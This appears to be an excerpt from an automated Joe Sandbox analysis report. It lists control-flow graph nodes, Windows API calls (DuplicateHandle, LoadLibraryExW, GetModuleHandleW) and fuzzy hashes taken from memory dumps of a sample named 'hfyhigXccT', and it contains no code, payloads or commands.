                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 81 158ba28-158bac4 DuplicateHandle 82 158bacd-158baea 81->82 83 158bac6-158bacc 81->83 83->82
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158BAB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 45ecdf78c676c766194680361df5b0d577ab05ea205a2bc6a8935b4e52f32df5
                                      • Instruction ID: 47d61a1427f50f8406b59330512d34d18d2ec654d974afc34d7660d4a372e55e
                                      • Opcode Fuzzy Hash: 45ecdf78c676c766194680361df5b0d577ab05ea205a2bc6a8935b4e52f32df5
                                      • Instruction Fuzzy Hash: 0E21D2B5900249AFDB10CFAAD984AEEBBF4FF48314F14851AE954B7310C774A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 86 158ba30-158bac4 DuplicateHandle 87 158bacd-158baea 86->87 88 158bac6-158bacc 86->88 88->87
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158BAB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 765dd7a7fba98861f23959afc365ad47e446a2dc4b1e0615d662f58187613b75
                                      • Instruction ID: 65ba7e9195de02e1a25e0a34d8512a393f9f28f0a104c7b52a690e760e063ca2
                                      • Opcode Fuzzy Hash: 765dd7a7fba98861f23959afc365ad47e446a2dc4b1e0615d662f58187613b75
                                      • Instruction Fuzzy Hash: C121C4B59002489FDB10CF9AD984ADEFBF8FB48324F14841AE954B7310D374A954DFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 91 1589971-15899b8 92 15899ba-15899bd 91->92 93 15899c0-15899ef LoadLibraryExW 91->93 92->93 94 15899f8-1589a15 93->94 95 15899f1-15899f7 93->95 95->94
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015897D1,00000800,00000000,00000000), ref: 015899E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 1149eb33bc8dddfe9d269a2e107c67b46425a8904e4c81e5213e59b8acef73ed
                                      • Instruction ID: 5377e740292cff2c07243cd2106e392f68c694b778271cccd5fd616a89d7e3fd
                                      • Opcode Fuzzy Hash: 1149eb33bc8dddfe9d269a2e107c67b46425a8904e4c81e5213e59b8acef73ed
                                      • Instruction Fuzzy Hash: 742106B6D002498FDB10CFAAC884AEEFBF4BB88314F15852ED455B7201C774A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 98 1588f98-15899b8 100 15899ba-15899bd 98->100 101 15899c0-15899ef LoadLibraryExW 98->101 100->101 102 15899f8-1589a15 101->102 103 15899f1-15899f7 101->103 103->102
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015897D1,00000800,00000000,00000000), ref: 015899E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: f2f916ad91b9464fe70a32d5329f5634013d3d2753d0b40b7a5929adc5a84b93
                                      • Instruction ID: d5fd795d0f14959ce9ff8a814e61aba0c012ee7d311747b74451dd053ac2db7f
                                      • Opcode Fuzzy Hash: f2f916ad91b9464fe70a32d5329f5634013d3d2753d0b40b7a5929adc5a84b93
                                      • Instruction Fuzzy Hash: C81103B69002499FDB10DF9AC844AEEFBF4FB88318F01842AD555B7300C774A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 106 15896f0-1589730 107 1589738-1589763 GetModuleHandleW 106->107 108 1589732-1589735 106->108 109 158976c-1589780 107->109 110 1589765-158976b 107->110 108->107 110->109
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 01589756
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: bb80771f6096f43120937457d85ce11570ef5c402fd1029dbd80c84b57b9b9a3
                                      • Instruction ID: bbc95a253f5ca76a3611dae2788151737a099192f2c69a0905e6fd9d443ab7c6
                                      • Opcode Fuzzy Hash: bb80771f6096f43120937457d85ce11570ef5c402fd1029dbd80c84b57b9b9a3
                                      • Instruction Fuzzy Hash: B911D2B5D006498FDB10DF9AC444ADEFBF8AB89224F14841AD529B7600C375A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 112 15896f2-1589730 113 1589738-1589763 GetModuleHandleW 112->113 114 1589732-1589735 112->114 115 158976c-1589780 113->115 116 1589765-158976b 113->116 114->113 116->115
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 01589756
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 6ecee4b383393605a9b6b26d2c423c0a3e3d2eda571d4ce61c676b6a7c92e6e0
                                      • Instruction ID: 547ded589dd74b2b970ba83e2c0e2ab9c222f622c261897681b380644cab7313
                                      • Opcode Fuzzy Hash: 6ecee4b383393605a9b6b26d2c423c0a3e3d2eda571d4ce61c676b6a7c92e6e0
                                      • Instruction Fuzzy Hash: A511E0B6D006498FDB20DF9AD444BEEFBF4AF89324F14852AD429B7600C375A546CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279421285.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13dd000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: